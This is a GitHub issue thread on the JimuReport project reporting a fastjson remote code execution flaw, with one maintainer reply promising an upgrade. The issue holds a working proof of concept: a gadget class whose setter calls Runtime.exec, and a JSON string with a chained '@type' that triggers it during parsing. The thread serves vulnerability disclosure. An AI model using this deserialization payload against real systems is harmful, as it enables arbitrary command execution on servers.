### ISSUE TITLE
fastjson远程执行漏洞

### ISSUE THREAD

**Issue by DavidJiangLee** [jeecgboot/JimuReport#1194]
##### 重现步骤：
import java.io.IOException;

public class Poc20220523 extends Exception {

    private static final long serialVersionUID = 6521489531168313334L;

    public void setName(String str) {
        try {
            Runtime.getRuntime().exec(str);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

import com.alibaba.fastjson.JSON;

public class JsonTest {
    public static void main(String[] args) {
        String json = "{\"@type\":\"java.lang.Exception\",\"@type\":\"Poc20220523\",\"name\":\"calc\"}";
        JSON.parse(json);
    }
}

#### 友情提示（为了提高issue处理效率）：
  - 积木报表是一款免费报表产品，功能免费源码不开放;
  - 未按格式要求发帖，会被直接删掉;
  - 请针对问题提供[报表设计SQL脚本](http://report.jeecg.com/2376604)或在官网制作报表示例并提供ID;
  - 针对不好重现的问题，请录制操作视频或详细的重现步骤；

**Comment by lvdandan16** [comment]
后续会升级，升级后会在升级日志中通知
